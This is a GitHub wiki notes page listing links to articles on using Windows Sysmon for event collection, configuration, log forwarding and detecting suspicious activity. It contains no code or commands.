Sysmon related - PSJoshi/Notes GitHub Wiki
- Sysmon 6 Windows event collection - https://community.rsa.com/community/products/netwitness/blog/2017/02/28/log-sysmon-6-windows-event-collection
- Enhance windows security with sysmon - https://www.graylog.org/blog/83-back-to-basics-enhance-windows-security-with-sysmon-and-graylog
- Sysmon powershell module - https://www.darkoperator.com/blog/2017/2/17/posh-sysmon-powershell-module-for-creating-sysmon-configuration-files
- Sending Windows logs - http://syspanda.com/index.php/2017/02/07/setting-up-elasticsearch-5-x-sending-windows-logs-using-winlogbeat-5-x/
- Parsing sysmon events for IR indicators - https://www.crowdstrike.com/blog/sysmon-2/
- User behaviour analytics - https://logrhythm.com/blog/understanding-insider-threats-with-ueba/
- Monitoring suspicious activities using Sysmon - https://blogs.technet.microsoft.com/motiba/2017/12/07/sysinternals-sysmon-suspicious-activity-guide/
- Command line logging - https://blog.defencelogic.io/security-information-event-management-design-why-you-need-enhanced-logging-on-windows-using-sysmon/
- Spotting the advisory with Windows events logs - https://www.iad.gov/iad/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm